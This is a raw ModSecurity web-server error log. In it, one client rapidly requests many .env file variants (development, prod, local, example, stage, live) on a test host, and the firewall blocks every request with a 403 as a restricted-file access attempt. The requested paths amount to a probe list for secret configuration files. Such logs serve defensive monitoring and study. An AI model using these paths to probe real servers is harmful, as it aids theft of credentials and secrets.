[Fri May 30 17:12:42.488161 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aDnK6qfe6YUdhe6un0PPvQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.development.local
[Fri May 30 17:12:42.488444 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aDnK6qfe6YUdhe6un0PPvQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.development.local
[Fri May 30 17:12:42.488678 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aDnK6qfe6YUdhe6un0PPvQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.development.local
[Fri May 30 17:12:42.907837 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aDnK6qfe6YUdhe6un0PPvgAAAAE"], referer: http://surf.test.indacotrentino.com/.env.prod.local
[Fri May 30 17:12:42.908115 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aDnK6qfe6YUdhe6un0PPvgAAAAE"], referer: http://surf.test.indacotrentino.com/.env.prod.local
[Fri May 30 17:12:42.908321 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aDnK6qfe6YUdhe6un0PPvgAAAAE"], referer: http://surf.test.indacotrentino.com/.env.prod.local
[Fri May 30 17:12:43.225311 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aDnK66fe6YUdhe6un0PPvwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.prod.local
[Fri May 30 17:12:43.225586 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aDnK66fe6YUdhe6un0PPvwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.prod.local
[Fri May 30 17:12:43.225790 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aDnK66fe6YUdhe6un0PPvwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.prod.local
[Fri May 30 17:12:43.643210 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDnK66fe6YUdhe6un0PPwAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.production.local
[Fri May 30 17:12:43.643477 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDnK66fe6YUdhe6un0PPwAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.production.local
[Fri May 30 17:12:43.643682 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDnK66fe6YUdhe6un0PPwAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.production.local
[Fri May 30 17:12:43.960904 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDnK66fe6YUdhe6un0PPwQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.production.local
[Fri May 30 17:12:43.961189 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDnK66fe6YUdhe6un0PPwQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.production.local
[Fri May 30 17:12:43.961391 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aDnK66fe6YUdhe6un0PPwQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.production.local
[Fri May 30 17:12:44.379315 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDnK7Kfe6YUdhe6un0PPwgAAAAE"], referer: http://surf.test.indacotrentino.com/.env.local
[Fri May 30 17:12:44.379632 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDnK7Kfe6YUdhe6un0PPwgAAAAE"], referer: http://surf.test.indacotrentino.com/.env.local
[Fri May 30 17:12:44.379858 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDnK7Kfe6YUdhe6un0PPwgAAAAE"], referer: http://surf.test.indacotrentino.com/.env.local
[Fri May 30 17:12:44.696984 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDnK7Kfe6YUdhe6un0PPwwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.local
[Fri May 30 17:12:44.697303 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDnK7Kfe6YUdhe6un0PPwwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.local
[Fri May 30 17:12:44.697559 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aDnK7Kfe6YUdhe6un0PPwwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.local
[Fri May 30 17:12:45.115210 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDnK7afe6YUdhe6un0PPxAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.example
[Fri May 30 17:12:45.115497 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDnK7afe6YUdhe6un0PPxAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.example
[Fri May 30 17:12:45.115701 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDnK7afe6YUdhe6un0PPxAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.example
[Fri May 30 17:12:45.432693 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDnK7afe6YUdhe6un0PPxQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.example
[Fri May 30 17:12:45.432971 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDnK7afe6YUdhe6un0PPxQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.example
[Fri May 30 17:12:45.433435 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aDnK7afe6YUdhe6un0PPxQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.example
[Fri May 30 17:12:45.851428 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDnK7afe6YUdhe6un0PPxgAAAAE"], referer: http://surf.test.indacotrentino.com/.env.stage
[Fri May 30 17:12:45.851723 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDnK7afe6YUdhe6un0PPxgAAAAE"], referer: http://surf.test.indacotrentino.com/.env.stage
[Fri May 30 17:12:45.851932 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDnK7afe6YUdhe6un0PPxgAAAAE"], referer: http://surf.test.indacotrentino.com/.env.stage
[Fri May 30 17:12:46.169194 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDnK7qfe6YUdhe6un0PPxwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.stage
[Fri May 30 17:12:46.169479 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDnK7qfe6YUdhe6un0PPxwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.stage
[Fri May 30 17:12:46.169678 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aDnK7qfe6YUdhe6un0PPxwAAAAE"], referer: http://surf.test.indacotrentino.com/.env.stage
[Fri May 30 17:12:46.587640 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aDnK7qfe6YUdhe6un0PPyAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.live
[Fri May 30 17:12:46.588059 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aDnK7qfe6YUdhe6un0PPyAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.live
[Fri May 30 17:12:46.588335 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aDnK7qfe6YUdhe6un0PPyAAAAAE"], referer: http://surf.test.indacotrentino.com/.env.live
[Fri May 30 17:12:46.906020 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aDnK7qfe6YUdhe6un0PPyQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.live
[Fri May 30 17:12:46.907032 2025] [:error] [pid 3513600] [client 129.146.124.161:58208] [client 129.146.124.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aDnK7qfe6YUdhe6un0PPyQAAAAE"], referer: http://surf.test.indacotrentino.com/.env.live
